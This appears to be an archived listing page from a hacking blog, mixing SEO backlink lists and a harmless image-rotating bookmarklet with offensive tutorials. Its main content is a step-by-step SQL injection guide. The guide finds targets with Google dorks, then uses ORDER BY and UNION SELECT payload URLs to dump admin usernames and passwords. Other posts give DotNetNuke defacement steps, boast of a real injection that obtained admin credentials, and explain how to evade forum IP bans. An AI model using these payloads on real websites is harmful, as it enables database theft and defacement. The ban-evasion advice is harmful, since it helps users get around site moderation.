Showing posts with label Website. Show all posts
Showing posts with label Website. Show all posts

Thursday, May 19, 2011

Rotate the images of any Wesbsites Using JavaScript |Computer Hacking Tricks


Hi friends , this post is just for fun.  here  i give you the funny JavaScript that will rotate the image of any website.

The JavaScript code:
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);

How to use?
Visit any website. Copy the above Javascript code and paste in the address bar. Then hit enter. Now you can see the magic, the images of website will start to rotate.



Continue   Reading>>

Thursday, February 24, 2011

Best Hacking sites-Top Hackers Sites


Hi friends, we have launched Top Ranking Site ,few days ago. Here is the list of Best Hacking sites( others categories are also available). If you really want to increase your Traffic and get backlink(Do Follow list,always), just submit your site here. Please add our Link code in your home page so that your website will get top rank.

Best Hackers Site

submit your site here:
top.breakthesecurity.com
Please Don't submit any porn sites.
Don't spam.
Submit your site only one time.

Continue   Reading>>

Saturday, February 12, 2011

Havij Tool - Automatic SQL Injection Process


Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.
The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.
The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

Continue   Reading>>

Wednesday, February 2, 2011

How to to disable right click using javascript?


I am posting this article as per the one of my user request. It is easy to disable right click in a website using javascript.

Code to disable:
oncontextmenu="alert('right click is disable');return false;"

now you may have doubt about placing this javascript code. This code should be in body as one of the attribute.

I think you can understand better if i give example.
<body oncontextmenu="alert('right click is disable');return false;"
>

i think now you understand.

see , this will disabled only for usual internet users. You can not protect it from hackers. We can disable javascript simply using webtool bar add on
Continue   Reading>>

Sunday, January 23, 2011

Register with another ip in forum,if you banned


Is your ip address banned in any forum or website? Can not you create account or login to your account?   Don't worry i am here to help you to create a new account.   Also You can have multiple accounts in forum.

How can you register after banned?
You can change your ip address. Visit from another ip and register the account.  Whenever you want to login to that forum or website hide ip address in simple way.

Don't use your old mail id or any other old details.  Create new one.
Continue   Reading>>

Friday, January 21, 2011

112 Dofollow Blogspot listed by PageRank


This article is especially for Web Masters. commenting in other blogs will increase your page rank. But we should give comment in quality blogs. Here the list of dofollow blogs(allows backlink). enjoy

Page Rank 7:
  1. Cisco Blog

Page Rank 6 :

  1. Grok dot com
  2. Currybet.net
  3. Sirpi.org/
  4. Eartheasy blog
  5. Social Times
  6. The Mall blog
  7. The Virtual Handshake
  8. Blog.photography.si.edu
  9. Midasoracle.org
  10. Weblog tools collection
  11. Interaction Design
  12. Jisc Digital Media

Page Rank 5:

  1. Andybeard.eu
  2. Oilman.ca
  3. Communityspark.com
  4. Layercake.net
  5. hobo-web
  6. Justaddwater.dk
  7. Krisbuytaert.be
  8. Therenegadewriter.com
  9. Iayork.com
  10. lifeinthefastlane.ca
  11. elleeseymour.com
  12. newcritics.com/blog1
  13. Links.org.au
  14. knrn.org
  15. Seobythesea.com
  16. Blog.dmbcllc.com
  17. Mouthpiecesports.com/blog
  18. Buzzmarketingwithblogs.com
  19. Bytesizecss.com
  20. Blog.astrumfutura.com
  21. Uncommonphotographers
  22. Aimee.mychores.co.uk
  23. Pitchinvasion.net
  24. Thevirtualhandshake.com/blog
  25. Kthread.com/kthread
  26. Blog.ruski.co.za
  27. Career.ucsb.edu/blog
  28. Gaming.psu.edu
  29. Blogs.cetis.ac.uk/asimong
  30. Blogs.nashuatelegraph.com
  31. Outofmygord.com
  32. Focusorganic.com
  33. Focus Organic
  34. Profitsfinancesite

Page Rank 4

  1. Stephan Miller
  2. Nickoo Shore
  3. BlueVerse
  4. BlogChef
  5. DearDrMoz
  6. TechGeeze
  7. Colloquium
  8. TheCroniclesOfR
  9. PhpCafe
  10. FreeBieShark
  11. MissNexus
  12. ZigPress
  13. Joebartender.com
  14. Deardrmoz.com
  15. Uppergreenside.org/blog
  16. Cinnamonthoughts.org/
  17. Memwg.com
  18. Steverenner.com
  19. Rebeccawalker.com/blog
  20. Canadienseneurope.org
  21. Alemsys.com
  22. Rumahabi.com
  23. Kid666.com
  24. Blueverse.com
  25. Barrywise.com
  26. Randomhacks.net
  27. Stomperblog.com
  28. Thesisthemehq.com
  29. Middlezonemusings.com
  30. WordPressmax.com
  31. Lillieammann.com
  32. Techjaws.com
  33. Kikolani.com
  34. Wnagele.com
  35. Bluehatseo.com
  36. Growsmartmaine.org/blog
  37. Thisclassicallife.com/weblog
  38. Costpernews.com
  39. Selberg.org
  40. Drownradio.com
  41. Omgpittsburgh.com
  42. Scrapscene.com
  43. Lifeintherough.com
  44. Phpcafe.net/blog
  45. Wallpaperstop.com
  46. Elearning.lse.ac.uk/blogs/usc
  47. Boykin.acis.ufl.edu
  48. Dmiracle.com
  49. Blog.waxmarketing.com
  50. Retirement-income.net/blog
  51. Nthambazale.com
  52. Smallbusinessbranding.com
  53. Blog.littlerockjams.com
  54. Affordable-internet-marketing.com
  55. Articlesnatch.com/blog
  56. Blog.winesworld.com
  57. Javelinmarketing.com/blog
  58. Stephanmiller.com
  59. Abstract2collective.blogspot.com
  60. Wpsx.psu.edu/bluerobot

Page Rank 3 :

  1. Qwertyweb
  2. TheReasoner
  3. DukDukMonk
  4. Internet Marketing
  5. Shanker Bakshi
Continue   Reading>>

Monday, January 17, 2011

iWebTool for Web Masters Mozilla add on


Are you Webmaster then you really need this mozilla add on.   When i search for web master add on  in google ,i found this mozill add on.  I really impressed by this add on.



Continue   Reading>>

Tuesday, December 28, 2010

Hacking website using SQL Injection -step by step guide


What is SQL Injection?
SQL injection is one of the popular web application hacking method.  Using the SQL Injection attack, an unauthorized person can access the database of the website. Attacker can extract the data from the Database.

What a hacker can do with SQL Injection attack?

* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server

So, here we go.

Step 1: Finding Vulnerable Website:
To find a SQL Injection vulnerable site, you can use Google search by searching for certain keywords. Those keyword often referred as 'Google dork'.

Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork
http://www.ziddu.com/download/13161874/A...t.zip.html

Copy one of the above keyword and paste in the google. Here , we will got lot search result with
We have to visit the websites one by one for checking the vulnerability.




Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:
site:www.victimsite.com inurl:index.php?id=
 Step 2: Checking the Vulnerability:
Now let us check the vulnerability of the target website. To check the vulnerability , add the single quotes(') at the end of the url and hit enter.

For eg:
http://www.victimsite.com/index.php?id=2'
If the page remains in same page or showing that page not found, then it is not vulnerable.

If you got an error message just like this, then it means that the site is vulnerable
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding Number of columns:
Great, we have found that the website is vulnerable to SQLi attack.  Our next step is to find the number of columns present in the target database.

For that replace the single quotes(') with "order by n" statement.

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

For eg:
http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4
If you get the error while trying the "x"th number,then no of column is "x-1".

I mean:
http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)

 
 so now x=8 , The number of column is x-1 i.e, 7.

In case ,if the above method fails to work for you, then try to add the "--" at the end of the statement.
For eg:
http://www.victimsite.com/index.php?id=2 order by 1--

Step 4: Find the Vulnerable columns:
We have successfully discovered the number of columns present in the target database.  Let us find  the vulnerable column by trying the query "union select columns_sequence".

Change the id value to negative(i mean id=-2).  Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:
if the number of columns is 7 ,then the query is as follow:
http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--
If the above method is not working then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--
Once you execute the query, it will display the vulnerable column.



Bingo,  column '3' and '7' are found to be vulnerable.  Let us take the first vulnerable column '3' . We can inject our query in this column.

Step 5: Finding version,database,user
Replace the 3 from the query with "version()"

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--
Now, It will display the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 6: Finding the Table Name
If the Database version is 5 or above. If the version is 4.x, then you have to guess the table names (blind sql injection attack).

Let us find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
Now it will display the list of table names. Find the table name which is related with the admin or user.




Let us choose the "admin " table.

Step 7: Finding the Column Name

Now replace the "group_concat(table_name) with the "group_concat(column_name)"

Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

We have to convert the table name to MySql CHAR() string .

Install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/

Once you installed the add-on, you can see a toolbar that will look like the following one. If you are not able to see the Hackbar, then press F9.

Select sql->Mysql->MysqlChar() in the Hackbar.


It will ask you to enter string that you want to convert to MySQLCHAR().  We want to convert the table name to MySQLChar .  In our case the table name is 'admin'.



Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.



Copy and paste the code at the end of the url instead of the "mysqlchar"

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
The above query will display the list of column.

For example: admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

Now replace the replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2).

Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For eg:
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--
If the above query displays the 'column is not found' erro, then try another column name from the list.

If we got luck, then it will display the data stored in the database depending on your column name.  For instance, username and password column will display the login credentials stored in the database.

Step 8: Finding the Admin Panel:
Just try with url like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
etc.
If you got luck ,you will find the admin page using above urls. or you can some kind of admin finder tools.

Warning:
The above post is completely for educational purpose only.  Never attempt to follow the above steps against third-party websites.  If you want to learn SQL injection attack method , then you can learn in safe environment by setup your own lab.

In this article, i just explained how to attack SQL injection vulnerable site in a n00b(newbie) way. If you want to become PenTester, you must know how these attacks works. In my next article, i will explain the SQL Injection depth.
Continue   Reading>>

Thursday, December 23, 2010

Hi friends my first SQL Injection attack


Hi friends, today i used SQL injection on one websites.  The result is positive.  Successfully i have found the Admin id and password.  But i did not deface it.  If you have any doubts in SQL Injection attack ask me frankly.   Ask your doubts in my forum.  http://forum.breakthesecurity.com

Come and join with me. 


you have understand here one thing clearly. My aim is not hacking a website. What i am doing? After implemeting sql injection, i tried to contact them and inform about vulnerability. I have to notify the vulnerability.
friends learn to do sql injection. But don't deface any sites. Beautse website owners put lots of works for websites. Like me help them by notifying about vulnerability
Continue   Reading>>

Monday, December 20, 2010

Online Funny photo effect editor


www.Picjoke.com

is a web services which allows you to add funny effects to your photo and images.While surfing on net i find this cool website.You will see some new effects to apply to your photo and images everyday.PicJoke is a completely free service and easy to use without any registration.This is the theme of picjoke.com Every day new photo effect

Just go to the site choose your language then choose your effect and start adding funny and cool effect to your images and photos
Continue   Reading>>

Tutorial for Hack a website Using DNN [Dot Net Nuke] Exploit


First Check whether the Website is vulnerable or not( if you don't know how to do it, read this)

Or simply copy this code to google and hit enter:

inurl:/portals/0

Open the home page and check any image which is located in /portals/0/
Check the location of the image. It should be located in /portals/0/

For e.g. in case of http://www.example.com ..the image is located at location- http://www.example.com/Portals/0/SHM.jpg

Yeah... it means this website is vulnerable and we can change the front page pic. Now the current image name is SHM.jpg. Rename the new image as SHM.jpg which you want to upload as a proof of you owned the system.

Continue   Reading>>

Sunday, December 19, 2010

How to Find a vulnerable website?


Google is best friend for Hackers. We can find the Vulnerable website using google search. This is known as Google Dorks.

Small List of Google Dork:
inurl:index.php?id=

inurl:gallery.php?id=

inurl:post.php?id=

inurl:article?id=

Continue   Reading>>

Saturday, December 18, 2010

COMMON METHODS USED FOR WEBSITE HACKING


  • Remote File Inclusion or RFI
  • SQL injection
  • Cross site scripting or XXS
  • Local file inclusion or LFI
  • Directory Traversal attack

Continue   Reading>>

Tuesday, December 14, 2010

What is Guest Blogging? What is the Use?


Guest blogging is used by bloggers as a way to network with other people within the blogosphere, grow relationships with other blog readers, and increase traffic for their own blogs. There are two primary types of guest blogging:

Guest blogging on your own blog:
      When someone writes a post for you to publish on your own blog. That blogger will typically contact you and ask to provide a guest post to you, or you can contact a blogger you like and request a guest post.
  
Continue   Reading>>

Break the Database of Website using SQL Injection


 In this tutorial i am going to guide how to hack the website database using SQL injection.  First of all you need to understand what is sql injection, so kindly read this tutorial

How to Break the Database:

Step 1 :
First we need to check whether website is vulnerable or not( i meant hackable or not) . In order to that, you need to find a page that looks like this:

Continue   Reading>>

Introduction to break Database of Website using Sql Injection


You may heard about Sql Injection or this is new word for you now.  In this post i am going to guide to Hack the website using the SQL Injection.

What is SQL?
  SQL is acronym of Structured Query Language.  SQL is common language for communicating with the Database.

Continue   Reading>>

Tuesday, December 7, 2010

How to do Domain Hijacking and Protection against Domain Hijacking


Domain Hijacking

You may hear some websites are hacked by hackers .  Sometimes your websites also hacked by hackers.  So In order to prevent your domain from attackers, you should know about Domain Hijacking.  In this post i will explain you how the Domain Hacking is done.
 

Continue   Reading>>

Sunday, December 5, 2010

Create a Forum For Free


*The post has been removed.*
Continue   Reading>>

Thursday, December 2, 2010

What is Database and MY SQL Injections



In this i'll give you intro to the SQL Injections. Next post will give you detailed information about the SQL injections.

What is the Database?
  Datbase is an application that stores a collection of Data.Database offers various APIs for creating, accessing and managing the data it holds. And database(DB) servers can be integrated with our web development so that we can pick up the things we want from the database without much difficulties.
Continue   Reading>>

Wednesday, December 1, 2010

Increase Your Traffic using Free Backlinks (PR8,7,6,,5,4 Sites)


Here i am going to give you list of website which has top page rank. Increase your traffic of your site or blog with this backlinks. Backlink is putting our website link to any other sites in order to get traffic. By giving comment you can get backlink or registering with your website address in some websites(like google profile).

   You can share your backlink in my site also("www.breakthesecurity.com"). post your website link as a comment.

Continue   Reading>>
Older Post Home
 

© Break The Security. Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com